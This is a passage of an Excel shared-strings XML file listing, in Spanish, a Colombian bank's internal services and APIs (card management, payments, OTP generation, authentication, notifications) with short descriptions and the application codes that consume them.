APP</t>
  </si>
  <si>
    <t>APIC _x000D_
AW0937 _x000D_
AW1285001 _x000D_
AW1299001 _x000D_
AW1316001 _x000D_
SVP _x000D_
AW1177001 _x000D_
AW1170 _x000D_
AW1287 _x000D_
AW1128 _x000D_
APP _x000D_
AW1313001</t>
  </si>
  <si>
    <t>Gestion Puntos Colombia</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permitirá realizar la integración necesaria contra el tercero Puntos Colombia donde se encuentran los puntos consolidados (Bancolombia y Éxito) programa de fidelización de clientes del proyecto Lealtad. </t>
  </si>
  <si>
    <t>Servicio-Puntos-Colombia_NU0016001</t>
  </si>
  <si>
    <t>SVP _x000D_
GDE _x000D_
APP _x000D_
AUD</t>
  </si>
  <si>
    <t>Gestion Realce Tarjetas</t>
  </si>
  <si>
    <t>GestionRealceTarjetaCredito ofrece a sus consumidores la opción de enviar los datos para el realce de una Tarjeta de Crédito</t>
  </si>
  <si>
    <t>TVP</t>
  </si>
  <si>
    <t>Gestion Recaudo DIAN</t>
  </si>
  <si>
    <t>Servicio que permite el recaudo realizando la consulta y la notificación de los clientes con la DIAN en tiempo real.</t>
  </si>
  <si>
    <t>Gestion Rediferidos</t>
  </si>
  <si>
    <t>En esta versión el servicio expone capacidades que permite al usuario consultar la información de rediferidos a través del tipo de documento y numero de documento también permite registrar el mantenimiento respectivo si el mismo es aceptado.</t>
  </si>
  <si>
    <t>AW1313</t>
  </si>
  <si>
    <t>Gestion Relacion Producto Cliente</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance realizar la creación o actualización de los registros en el archivo CXREF (archivo del iSeries que contiene la relación cliente-producto).</t>
  </si>
  <si>
    <t>AW1078 _x000D_
AW1011</t>
  </si>
  <si>
    <t>Gestion Remesas</t>
  </si>
  <si>
    <t>El servicio Gestión Remesas, administra las remesas del exterior que son enviadas para ser pagadas en Bancolombia.</t>
  </si>
  <si>
    <t>NU0084001</t>
  </si>
  <si>
    <t>Gestion Sesion</t>
  </si>
  <si>
    <t>El servicio GestionSesion permite la administración de sesiones de un cliente autenticado contra un canal virtual del banco. Ofrece operaciones para la validar, cerrar y mantener (keep-alive) una sesión, asi como también un mecanismo para compartir una sesión de un canal a otro y así habilitar el single sign on entre canales.</t>
  </si>
  <si>
    <t>NU0017001 _x000D_
NU0034001 _x000D_
AW0360004 _x000D_
AW0278001 _x000D_
AW1240001 _x000D_
AW1281002 _x000D_
NU0021001 _x000D_
NU0143001 _x000D_
SVP _x000D_
NU0104001 _x000D_
AW1059001 _x000D_
AW1165 _x000D_
AW0453001 _x000D_
NU0004001 _x000D_
AW1128 _x000D_
AW1281003 _x000D_
AW0360006 _x000D_
NU0014001 _x000D_
APP _x000D_
AW1312001 _x000D_
AW0955 _x000D_
DEVELOPSOATEST _x000D_
AW1203001 _x000D_
NU0035001 _x000D_
AW1218001 _x000D_
NU0046001 _x000D_
AW1291001 _x000D_
NU0094001 _x000D_
NU0162001 _x000D_
AW1435001</t>
  </si>
  <si>
    <t>Gestion SimCard</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite realizar la consulta de la última reexpedición de una simcard, por medio del número telefónico asociado a esta.
 Servicio configurado temporalmente para los operados Movistar y Claro.
 </t>
  </si>
  <si>
    <t>AW1086001 _x000D_
SSC _x000D_
AW1287 _x000D_
AW1313001</t>
  </si>
  <si>
    <t>Gestion Solicitud Credito Consumo</t>
  </si>
  <si>
    <t>El servicio permite gestionar el proceso de ventas digitales de algún producto de crédito de consumo (pre-aprobados, tarjeta de crédito, crediágil, presta-nómina y libranza) , permitiendo la creación del caso y su avance entre cada uno de los puntos de interacción con el consumidor.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW0937</t>
  </si>
  <si>
    <t>AW0937 _x000D_
AW1148001 _x000D_
AW1128</t>
  </si>
  <si>
    <t>AW1177</t>
  </si>
  <si>
    <t>Gestion Tarjeta Credito</t>
  </si>
  <si>
    <t>El componente permite realizar compras con tarjetas de crédito sin pasar por la redes, únicamente deberá estar enrolado como medio de pago de uno de los aliados comerciales del Banco.</t>
  </si>
  <si>
    <t>Tarjeta Crédito</t>
  </si>
  <si>
    <t>Gestion Tarjetas Credito</t>
  </si>
  <si>
    <t>El servicio Gestión Tarjetas Crédito permite exponer las diferentes capacidades de novedades y validaciones que se pueden aplicar sobre el Producto Tarjeta de Crédito y se describen brevemente a continuación  - Validar código de seguridad</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
AW1316001 _x000D_
NU0103001 _x000D_
NU0100001</t>
  </si>
  <si>
    <t>El servicio Gestión Tarjetas Crédito permite realizar novedades sobre el producto Tarjetas de Crédito, tales como:  • Crear tarjeta • Bloquear tarjeta • Activar tarjeta  Actualmente sólo está disponible la capacidad de Creación de Tarjetas</t>
  </si>
  <si>
    <t>Gestion Tarjetas Debito</t>
  </si>
  <si>
    <t>El servicio Gestión Tarjetas Débito permite exponer las diferentes capacidades de novedades y validaciones que se pueden aplicar sobre el Producto Tarjeta Débito.</t>
  </si>
  <si>
    <t>NU0100001 _x000D_
PRODUCTORCONSUMIDOR _x000D_
NU0104001</t>
  </si>
  <si>
    <t>AW1177 _x000D_
NU0021001 _x000D_
AW1128</t>
  </si>
  <si>
    <t>Gestion Tasa Pactada</t>
  </si>
  <si>
    <t>El servicio Gestión Tasa Pactada permitirá realizar la gestión de las tasas pactadas, inicialmente permitirá consultar las tasas que ha pactado el cliente.</t>
  </si>
  <si>
    <t>Gestion Transferencias Internacionales</t>
  </si>
  <si>
    <t>El servicio Gestión Transferencias Internacionales permitirá a los consumidores consultar información relacionada con los costos, detalles, y seguimiento de una transferencia internacional vía Swift, además de notificar a Swift detalles cuando actuamos como receptor de una transferencia.</t>
  </si>
  <si>
    <t>SWIFT_SWIFT_AW0290001</t>
  </si>
  <si>
    <t>El servicio Gestión Transferencias Internacionales permitirá a los consumidores consultar información relacionada con los costos, detalles, y seguimiento de una transferencia internacional vía Swift, además de notificar a Swift detalles cuando actuamos como receptor de una transferencia.   Se genera nueva versión 2.0.0. haciendo referencia a la versión 3 del GPI.</t>
  </si>
  <si>
    <t>CDE _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Gestion Usuario Credito Consumo</t>
  </si>
  <si>
    <t>La creación y/o actualización de un usuario en el DA host to Host para la unidad Organizativa de Sufi en la cual van a estar matriculados  los vendedores de los comercios afiliados y usuarios internos que harán uso de la aplicación ConSufi,  El registro de dicho usuario en la aplicación responsable de la gestión de contraseñas – Biovoz, esto es la creación y/actualización._x005F_x000D_ _x005F_x000D_ El envío del token al usuario para que efectúe el enrolamiento de la voz._x005F_x000D_ _x005F_x000D_ Para ello hará uso de los servicios GestionUsuarioDA, RegistroUsuarioValidacionBiometrica y EnviarNotificacion.</t>
  </si>
  <si>
    <t>APP-Sufi_AW1209001</t>
  </si>
  <si>
    <t>AW1081001 _x000D_
TP</t>
  </si>
  <si>
    <t>Gestion Usuario DATerceros</t>
  </si>
  <si>
    <t>Servicio a través del cual se efectuará la creación y/o actualización de un usuario en el Directorio Activo Host to Host para la Unidad Organizativa de Sufi.</t>
  </si>
  <si>
    <t>TP</t>
  </si>
  <si>
    <t>Gestion Usuario Valores</t>
  </si>
  <si>
    <t>El servicio GestionUsuarioValores permitirá a los consumidores autenticar a un usuario mediante número de documento y contraseña. La idea fundamental es migrar la arquitectura del Audiovalor para una arquitectura estable y escalable que permita estabilizar la sucursal telefónica de valores Bancolombia</t>
  </si>
  <si>
    <t>Servicios Valores_AW1273001</t>
  </si>
  <si>
    <t>Gestion Usuarios Divisas</t>
  </si>
  <si>
    <t>El servicio Gestión Usuarios Divisas tiene como objetivo realizar funcionalidades para la consulta o creación de un usuario no cliente Bancolombia que requiera realizar una operación de compra o venta de divisas.</t>
  </si>
  <si>
    <t>Gestionar CDT</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio tiene como propósito llevar a cabo todas las novedades que se le pueden realizar a un CDT, las cuales pueden incluir, modificaciones a las condiciones comerciales. </t>
  </si>
  <si>
    <t>SU2 _x000D_
AW0210001 _x000D_
SU5 _x000D_
SVE</t>
  </si>
  <si>
    <t>Gestionar Documentos</t>
  </si>
  <si>
    <t>El servicio de gestionar documentos tiene como propósito virtualizar las funcionalidades expuestas por los aplicativos de Gestión Documental y de Proveedor de Servicios para la validación y posterior almacenamiento de información, requerida a los clientes por parte de los productos o procesos del Banco.</t>
  </si>
  <si>
    <t>AW0499 _x000D_
AW0856 _x000D_
AW0611001</t>
  </si>
  <si>
    <t>Gestionar Giros</t>
  </si>
  <si>
    <t>Gestionar Llaves</t>
  </si>
  <si>
    <t>Sincroniza las llaves de un cliente creadas en uno o más sistemas Back-end del grupo Bancolombia.</t>
  </si>
  <si>
    <t>AW0611001 _x000D_
AW0709001</t>
  </si>
  <si>
    <t>Gestionar Metadata_BB5</t>
  </si>
  <si>
    <t>Permite la actualización de las novedades de información de los atributos (metadatos) generados en los gestores documentales de terceros, en el servidor de contenido de Bancolombia. Este servicio adicionalmente permite registrar nuevos documentos con sus respectivos atributos (metadatos) en el servidor de contenido de Bancolombia.</t>
  </si>
  <si>
    <t>ACTUALIZACION DE METADATA_AW0500001</t>
  </si>
  <si>
    <t>AW0718001 _x000D_
AW0550 _x000D_
Carvajal</t>
  </si>
  <si>
    <t>Gestionar Pagare Electronico</t>
  </si>
  <si>
    <t>Servicio creado para ser invocado por cualquier aplicación que requiera llevar a cabo la administración del pagaré electrónico mediante el uso de los servicios ofrecidos por Deceval.</t>
  </si>
  <si>
    <t>Deceval</t>
  </si>
  <si>
    <t>AW0937 _x000D_
AW0856 _x000D_
AW1097001 _x000D_
AW1156 _x000D_
AW1197 _x000D_
AW0939 _x000D_
DEVELOPSOATEST _x000D_
AW1203001 _x000D_
NU0004001 _x000D_
AW1285001 _x000D_
AW1176 _x000D_
AW1374007 _x000D_
PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Gestionar Prospecto</t>
  </si>
  <si>
    <t>El servicio les permite a los consumidores obtener no sólo información específica asociada a la creación o actualización de un cliente.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW0922 _x000D_
AW1128</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW0748001 _x000D_
AW0856 _x000D_
SVP _x000D_
AW1128 _x000D_
NU0034001 _x000D_
AW1011 _x000D_
AW1316 _x000D_
AW1218001 _x000D_
NU0146001 _x000D_
NU0149001 _x000D_
AW1227001 _x000D_
AW0623001</t>
  </si>
  <si>
    <t>AW0922</t>
  </si>
  <si>
    <t>Gestionar Solicitud</t>
  </si>
  <si>
    <t>El objetivo es tener una estrategia en la cual se unifique la atención de los Créditos Hipotecarios y Leasing Habitacional en un solo flujo y poder ofrecer a los clientes y aliados una propuesta unificada y líder en el mercado</t>
  </si>
  <si>
    <t>Gestionar Solicitudes De Credito</t>
  </si>
  <si>
    <t xml:space="preserve">El objetivo del servicio es gestionar la solicitud de Crédito y Consumo. </t>
  </si>
  <si>
    <t>AW0937 _x000D_
AW0718 _x000D_
AW1128</t>
  </si>
  <si>
    <t>Gestionar Tarjeta En Sistema De Transporte</t>
  </si>
  <si>
    <t>El servicio GestionarTarjetaEnSistemaDeTransporte, provee la funcionalidad de activar y bloquear la tarjeta débito cívica asignada a un cliente, en el sistema de transporte Metro</t>
  </si>
  <si>
    <t>Modulo de Administracion de Tarjetas (MAT)_MAT_ISMAT0003</t>
  </si>
  <si>
    <t>MAT</t>
  </si>
  <si>
    <t>Grabar Discrepancia</t>
  </si>
  <si>
    <t>Permite almacenar la aceptación o rechazo de la discrepancia de un producto de Carta de Crédito de Importación o Carta de Crédito de Exportación que tiene el cliente.</t>
  </si>
  <si>
    <t>Grabar Movimiento En Cuenta</t>
  </si>
  <si>
    <t>El servicio GrabarMovimientoEnCuenta provee una funcionalidad que permite la afectación de cuentas de clientes (Ahorros o Corrientes) para registrar pagos hechos en Murex a los clientes en sus procesos de negociación con Banitsmo.</t>
  </si>
  <si>
    <t>Murex_MUREX-CORE_AW0434001</t>
  </si>
  <si>
    <t>MX</t>
  </si>
  <si>
    <t>Grabar Participante</t>
  </si>
  <si>
    <t>Permite crear participante en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)</t>
  </si>
  <si>
    <t>AW0611002 _x000D_
AW0611001 _x000D_
AW0795 _x000D_
Banismo</t>
  </si>
  <si>
    <t>SAP CRM</t>
  </si>
  <si>
    <t>AW0683001 _x000D_
AW0563001</t>
  </si>
  <si>
    <t>Gwe - Accounts Reconciliation</t>
  </si>
  <si>
    <t>Gwe - Accounts Reconciliation - Reconciliation Data Query</t>
  </si>
  <si>
    <t>gwe-accounts-reconciliation-data-query</t>
  </si>
  <si>
    <t>Gwe-Payments</t>
  </si>
  <si>
    <t>Gwe - Payments - QR Codes Management</t>
  </si>
  <si>
    <t>gwe-payments-qr-codes-management</t>
  </si>
  <si>
    <t>El api Gwe - Payments - QR Codes Management permite generar un código QR (código, no imagen) que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P). Adicionalmente se puede consultar la información de los QR generados por un comercio y la información de un QR en especí­fico.  El proveedor de este servicio es Todo1.</t>
  </si>
  <si>
    <t>TPM ALM APP_AW0955001 _x000D_
 Ecosistema De Pagos_AW1314001 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>API GWE</t>
  </si>
  <si>
    <t>Gwe-Accounts ALM</t>
  </si>
  <si>
    <t>Gwe-Account ALM - Balance Query</t>
  </si>
  <si>
    <t>gwe-account-alm-balance-query</t>
  </si>
  <si>
    <t>Esta API permite consultar el saldo disponible de una cuenta de Ahorro a La Mano</t>
  </si>
  <si>
    <t>TPM ALM APP_AW0955001 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Gwe-Account ALM - Customer Vinculation</t>
  </si>
  <si>
    <t>gwe-account-alm-customer-vinculation</t>
  </si>
  <si>
    <t>El API tiene como objetivo crear una cuenta de ahorros de Bancolombia Ahorro a la Mano.</t>
  </si>
  <si>
    <t>Gwe-Account ALM - Financial Agreement Query</t>
  </si>
  <si>
    <t>gwe-accounts-alm-financial-agreement</t>
  </si>
  <si>
    <t>El API tiene como objetivo consultar los convenios que existen con Bancolombia y que se puedan usar a través de una cuenta de ahorros de Bancolombia Ahorro a la Mano.</t>
  </si>
  <si>
    <t>Gwe-Account ALM - Transactions</t>
  </si>
  <si>
    <t>gwe-account-alm-transactions</t>
  </si>
  <si>
    <t>Esta API permite consultar los movimientos de los últimos de los 2 meses de una cuenta de Ahorro a La Mano</t>
  </si>
  <si>
    <t>Gwe-Account ALM - Validation Payment Bill</t>
  </si>
  <si>
    <t>gwe-account-alm-validation-payment-bill</t>
  </si>
  <si>
    <t>El API tiene como objetivo validar el pago a convenios a través de una cuenta de ahorros de Bancolombia Ahorro a La Mano.</t>
  </si>
  <si>
    <t>Gwe-Account ALM - Withdraw Cash</t>
  </si>
  <si>
    <t>gwe-account-alm-withdraw-cash</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API permite realizar el enví­o de un otp para retirar dinero de una cuenta de Bancolombia Ahorro a la Mano en un cajero </t>
  </si>
  <si>
    <t>Gwe-Accounts ALM - Account Reissue</t>
  </si>
  <si>
    <t>gwe-accounts-alm-account-reissue</t>
  </si>
  <si>
    <t>El API permite realizar el cambio de número de la cuenta de ahorros Bancolombia a La Mano (ALM antes conocido como Ahorro a La Mano).</t>
  </si>
  <si>
    <t>Gwe-Accounts ALM - Validation NEQUI</t>
  </si>
  <si>
    <t>gwe-accounts-alm-validation-nequi</t>
  </si>
  <si>
    <t>El API consiste en validar si un cliente al momento de vincularse a una cuenta de Bancolombia Ahorro a La Mano ya posee una cuenta de ahorros de tramites simplificados en Nequi, ya que por ley, un cliente solo puede poseer una cuenta de ahorros de tramites simplificados. Si al momento de consumir el API de consulta cuenta Nequi este no responde, el cliente debe poder vincularse y posterior operaciones se encargará de realizar las investigaciones y contactar al cliente en caso de que ya posea una cuenta de ahorros de tramites simplificados.</t>
  </si>
  <si>
    <t>Gwe-Cards Wallet</t>
  </si>
  <si>
    <t>Gwe-Cards - Card Verification Code</t>
  </si>
  <si>
    <t>gwe-cards-card-verification-code</t>
  </si>
  <si>
    <t>Esta API Permite validar información del código CVC de tarjetas</t>
  </si>
  <si>
    <t>Billetera Movil _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Gwe-Cards - Cards Preferences</t>
  </si>
  <si>
    <t>gwe-cards-preferences</t>
  </si>
  <si>
    <t>Permite definir algunas preferencias o configuraciones sobre las tarjetas gestionadas por la Billtera Movil</t>
  </si>
  <si>
    <t>Gwe-Cards - Customer Cards</t>
  </si>
  <si>
    <t>gwe-cards-customer-cards</t>
  </si>
  <si>
    <t>Permite gestionar las tarjetas de un cliente de billetera móvil en la App Personas</t>
  </si>
  <si>
    <t>Gwe-Customers</t>
  </si>
  <si>
    <t>Gwe-Customer - Basic Information</t>
  </si>
  <si>
    <t>gwe-customer-basic-information</t>
  </si>
  <si>
    <t>Te ofrecemos la forma mas fácil y confiable de conocer a tu usuario con información clave y veraz en diferentes niveles de profundidad según las necesidades de tu negocio.  Todo sin necesidad que todos se llenen formularios</t>
  </si>
  <si>
    <t>RecuperarDatosCliente/V4.0</t>
  </si>
  <si>
    <t>Visor Interactivo_AW1249 _x000D_
 Prometeo_AW0360009 _x000D_
 GestionaNegocios_AW1302001 _x000D_
 Aplicación Transversal de Lealtad - ATL_AW1284 _x000D_
 Boton Bancolombia_AW1277001 _x000D_
 PortalSalaDeVentas_AW1258002 _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 MUVERANG_NU0063001 _x000D_
 MarketplaceEcosistemasPersonas_NU0035001 _x000D_
 Transfiya_NU0017001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 PORTALCOBRANZA_AW1294001 _x000D_
 VisorInteractivo_AW1249 _x000D_
 HabitatCore_AW1281003</t>
  </si>
  <si>
    <t>Gwe-Customer - Check Control List</t>
  </si>
  <si>
    <t>gwe-customer-check-control-list</t>
  </si>
  <si>
    <t>Gwe-Customers ALM</t>
  </si>
  <si>
    <t>Gwe-Customer ALM - Birth Date Query</t>
  </si>
  <si>
    <t>gwe-customer-alm-birth-date-query</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API permite consultar la fecha de nacimiento de un cliente y la fecha de expedición de su documento de identidad. </t>
  </si>
  <si>
    <t>Gwe-Customer ALM - Change Email</t>
  </si>
  <si>
    <t>gwe-customer-alm-change-email</t>
  </si>
  <si>
    <t>El API permite realizar el cambio de correo electrónico del cliente de la cuenta de ahorros Bancolombia a La Mano (ALM antes conocido como Ahorro a La Mano).</t>
  </si>
  <si>
    <t>Gwe-Customer ALM - Customer Type Query</t>
  </si>
  <si>
    <t>gwe-customer-alm-customer-type-query</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API permite consultar si un cliente tiene cuenta Bancolombia, si tiene cuenta de ahorro a la mano, si es cliente exclusivo de ahorro a la mano, si está inscrito en el sistema de alertas y notificaciones y si fue vinculado de forma centralizada. </t>
  </si>
  <si>
    <t>Gwe-Customer ALM - Reissue Limit Validation</t>
  </si>
  <si>
    <t>gwe-customer-alm-reissue-limit-validation</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API permite validar si un cliente puede realizar una reexpedición de cuenta de Bancolombia Ahorro a la Mano (Cambio de número de teléfono de la cuenta ALM). </t>
  </si>
  <si>
    <t>Gwe-Customer ALM - Validate Customer</t>
  </si>
  <si>
    <t>gwe-customer-alm-validate-customer</t>
  </si>
  <si>
    <t>El API permite realizar la validación de si un cliente se puede vincular a Ahorro a la Mano</t>
  </si>
  <si>
    <t>Gwe-Enrollment</t>
  </si>
  <si>
    <t>Gwe-Enrollment Users Management</t>
  </si>
  <si>
    <t>API para el manejo de enrolamiento</t>
  </si>
  <si>
    <t>APM_AW1097001 _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 NU0037002_VDSORQUESTADORAUTOGESTION_BACK _x000D_
 MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>VentasDigitalesSufiVehiculos_AW1097001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 EnrolamientoSufiVehiculos_AW1097001 _x000D_
 MonitoreoGWEEnrollment_AW1097001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000D_
 Prueba - sufi - Enrollment - PRD</t>
  </si>
  <si>
    <t>Gwe-Fraud</t>
  </si>
  <si>
    <t>Gwe-Fraud - RSA Monitoring</t>
  </si>
  <si>
    <t>gwe-fraud-rsa-monitoring</t>
  </si>
  <si>
    <t>El api Gwe-Fraud - RSA Monitoring permite realizar monitoreo antifraude para la autenticación y la transaccionalidad de Botón Bancolombia.</t>
  </si>
  <si>
    <t>Boton Bancolombia_AW1277001 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Gwe-JWK Wallet</t>
  </si>
  <si>
    <t>Gwe-JWK - Wallet</t>
  </si>
  <si>
    <t>gwe-JWK-wallet</t>
  </si>
  <si>
    <t>Un JWK (JSON Web key) es una estructura de datos JSON que representa una clave criptográfica.</t>
  </si>
  <si>
    <t>Gwe-Legal Wallet</t>
  </si>
  <si>
    <t>Gwe-Legal - Terms and Conditions</t>
  </si>
  <si>
    <t>gwe-legal-terms-and-conditions</t>
  </si>
  <si>
    <t>Permite realizar operaciones relacionadas a los términos y condiciones de uso de billetera móvil en la App Personas, entre las operaciones se encuentran: - Consultar los términos y condiciones - Aceptar términos y condiciones de un usuario especí­fico - Consultar si un usuario ya aceptó los términos y condiciones</t>
  </si>
  <si>
    <t>Gwe-Loans ALM</t>
  </si>
  <si>
    <t>Gwe-Loans ALM - Payment Loan</t>
  </si>
  <si>
    <t>gwe-loans-alm-payment</t>
  </si>
  <si>
    <t>(Trx 0621) encargada de desembolsar el crédito de acuerdo a los parámetros fijados por el cliente y el sistema</t>
  </si>
  <si>
    <t>Gwe-Loans ALM - Payment Loan Update State</t>
  </si>
  <si>
    <t>gwe-loans-alm-payment-loan-update-state</t>
  </si>
  <si>
    <t>Actualiza estado de precalculado a vendido</t>
  </si>
  <si>
    <t>Gwe-Loans ALM - Pre Loan Query</t>
  </si>
  <si>
    <t>El servicio Crédito a la mano tiene como finalidad ofrecer a los clientes de ahorro a la mano un prestamo con abono inmediato en su cuenta al momento de aceptarlo. Una vez que el cliente se auntentique dentro de la aplicación se dispara la una nueva transacción (Trx 0619) consulta preaprobado, esta va a integración, donde integración consume un SP (store procedure) y realizala consulta del cliente en una base de datos Oracle, la cual nos devuelve si el cliente posee una oferta de un prestamo preaprobado, si el cliente posee una oferta y la acepta se dispara la nueva transacción (Trx 0621) el desembolso del prestamo, donde a tráves de esta cosumimos un servicio expuesto por el departamento de carteras, y de manera automatica se efectuará el crédito a la cuenta del cliente, y por ultimo se dispara otra nueva transacción (Trx 0622) Actualización del preaprobado, donde se marcara en la base de datos Oracle que la oferta ya fue vendida, esta funciona bajo la misma filosofia de la consulta del preaprobado, vamos a integración y ellos a traves del SP actualizan la información del prestamo.</t>
  </si>
  <si>
    <t>Gwe-Notifications</t>
  </si>
  <si>
    <t>Gwe-Notification - Send Email Basic</t>
  </si>
  <si>
    <t>gwe-notification-send-email-basic</t>
  </si>
  <si>
    <t>AppNotifications_AW0360009 _x000D_
 Tracking_AW1286001 _x000D_
 Prometeo_AW0360009 _x000D_
 PayProMerchant_AW1235001 _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 Boton Bancolombia_AW1277001 _x000D_
 GestionaNegocios_AW1302001 _x000D_
 TPM ALM APP_AW0955001</t>
  </si>
  <si>
    <t>Gwe-Notification - Send SMS Massive</t>
  </si>
  <si>
    <t>gwe-notification-send-sms-massive</t>
  </si>
  <si>
    <t>El Api permite realizar el envio de mensajes SMS a través del proveedor de delivery Inalambria. Este servicio esté enfocado a consumidores transaccionales que realizan envío de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes.</t>
  </si>
  <si>
    <t>EnvioSmsInalambria/V1.0</t>
  </si>
  <si>
    <t>Gwe-Security ALM</t>
  </si>
  <si>
    <t>Gwe-OAuth - Provider for ALM</t>
  </si>
  <si>
    <t>gwe-oauth-alm</t>
  </si>
  <si>
    <t>Proveedor de OAuth para ALM</t>
  </si>
  <si>
    <t>Gwe-Security</t>
  </si>
  <si>
    <t>Gwe-OAuth - Provider from WAS Validator Code</t>
  </si>
  <si>
    <t>gwe-oauth-otp</t>
  </si>
  <si>
    <t>Gwe-Payments - Create Recharge</t>
  </si>
  <si>
    <t>gwe-payments-create-recharge</t>
  </si>
  <si>
    <t>Service that allows recharging different services such as Entertainment, public services, mobile telephony, TV.</t>
  </si>
  <si>
    <t>Gwe-Payments Wallet</t>
  </si>
  <si>
    <t>Gwe-Payments - QR Payments</t>
  </si>
  <si>
    <t>gwe-payments-qr-payments</t>
  </si>
  <si>
    <t>Permite realizar pagos con código QR en billetera móvil en la App Personas</t>
  </si>
  <si>
    <t>Gwe-Payments ALM</t>
  </si>
  <si>
    <t>Gwe-Payments ALM - Create PIN</t>
  </si>
  <si>
    <t>gwe-payments-alm-create-pin</t>
  </si>
  <si>
    <t xml:space="preserve">El API permite realizar la generación de un pin para transferencia de dinero entre cuentas de Bancolombia Ahorro a la Mano Para Realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden: 1. Generar Pin de Pago (Esta API) 2. Enviar el Dinero (Gwe-Payments ALM - Send Money) </t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Gwe-Payments ALM - Financial Agreement Light Query</t>
  </si>
  <si>
    <t>gwe-payments-alm-financial-agreement-light-query</t>
  </si>
  <si>
    <t>El API tiene como objetivo hacer una consulta detallada de un convenio Adhoc, Presenment y REDEBAN</t>
  </si>
  <si>
    <t>Gwe-Payments ALM - Financial Agreement Query</t>
  </si>
  <si>
    <t>gwe-payments-alm-financial-agreement-query</t>
  </si>
  <si>
    <t>Esta APi tiene como objetivo consultar y listar los convenios existentes</t>
  </si>
  <si>
    <t>Gwe-Payments ALM - Payment Bill</t>
  </si>
  <si>
    <t>gwe-payments-alm-payment-bill</t>
  </si>
  <si>
    <t xml:space="preserve">El API tiene como objetivo realizar el pago de una factura Adhoc, Presenment y REDEBAN </t>
  </si>
  <si>
    <t>Gwe-Payments ALM - Send Money</t>
  </si>
  <si>
    <t>gwe-payments-alm-send-money</t>
  </si>
  <si>
    <t>Para realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden:   1. Generar Pin de Pago (Gwe-Payments ALM - Create PIN)   2. Enviar el Dinero (Esta API)</t>
  </si>
  <si>
    <t>Gwe-Payments ALM - Send Payment Receipt</t>
  </si>
  <si>
    <t>gwe-payments-alm-send-payment-receipt</t>
  </si>
  <si>
    <t>El API permite enviar por correo un comprobante de transferencia de dinero realizada entre cuentas de Bancolombia a La Mano (BLM)</t>
  </si>
  <si>
    <t>Gwe-Register</t>
  </si>
  <si>
    <t>Gwe-Register - Wallet</t>
  </si>
  <si>
    <t>gwe-register-wallet</t>
  </si>
  <si>
    <t>Esta API permite realizar las siguientes operaciones: - Registrar billeteras  - Consultar si un usuario ya tiene una billetera registrada.</t>
  </si>
  <si>
    <t>Gwe-RSK Wallet</t>
  </si>
  <si>
    <t>Gwe-RSK - Wallet</t>
  </si>
  <si>
    <t>gwe-rsk-wallet</t>
  </si>
  <si>
    <t>Esta API permite registrar y revocar llaves para el consumo de las APIs que requieren información privada de usuario en Wallet Server</t>
  </si>
  <si>
    <t>Gwe-Security ALM - Authentication</t>
  </si>
  <si>
    <t>gwe-security-alm-authentication</t>
  </si>
  <si>
    <t>El API permite realizar la autenticación de clientes para la aplicación de Bancolombia a la Mano</t>
  </si>
  <si>
    <t>Gwe-Security ALM - Change Password</t>
  </si>
  <si>
    <t>gwe-security-alm-change-password</t>
  </si>
  <si>
    <t>El API permite realizar el cambio de contraseña del cliente de la cuenta de ahorros Bancolombia a La Mano (ALM antes conocido como Ahorro a La Mano).</t>
  </si>
  <si>
    <t>Gwe-Security ALM - Collection OTP Generation</t>
  </si>
  <si>
    <t>gwe-security-alm-collection-otp-generation</t>
  </si>
  <si>
    <t>API para la generacion de OTP de recaudos</t>
  </si>
  <si>
    <t>Gwe-Security ALM - OTP Management</t>
  </si>
  <si>
    <t>gwe-security-alm-otp-management</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API permite realizar la generación de OTPs para Bancolombia Ahorro a la Mano, en los casos que se requieran realizar las siguientes solicitudes:   - 061201 -&gt; Vinculación OTP Incial   - 061202 -&gt; Vinculación OTP al celular   - 061801 -&gt; Vinculación Centralizada   - 061501 -&gt; Reexpedición OTP Incial   - 061502 -&gt; Reexpedición OTP cambio de número   - 061601 -&gt; Cambio de correo   - 041301 -&gt; Cambio de clave </t>
  </si>
  <si>
    <t>Gwe-Security ALM - Set Password</t>
  </si>
  <si>
    <t>gwe-security-alm-set-password</t>
  </si>
  <si>
    <t>Esta API tiene como objetivo asignar la contraseña a una cuenta de ahorro Bancolombia Ahorro a la Mano, cuando el cliente ha sido registrado de forma centralizada (Cuando es una cuenta de nómina).</t>
  </si>
  <si>
    <t>Gwe-Parameter-Wallet</t>
  </si>
  <si>
    <t>Gwe-Wallet - Parameter Management</t>
  </si>
  <si>
    <t>gwe-wallet-parameter-management</t>
  </si>
  <si>
    <t>Este servicio permitirá exponer las diferentes funcionalidades de creación, modificación, consulta y eliminación de los parámetros propios para el canal Billetera.</t>
  </si>
  <si>
    <t>Inscripcion De Facturas</t>
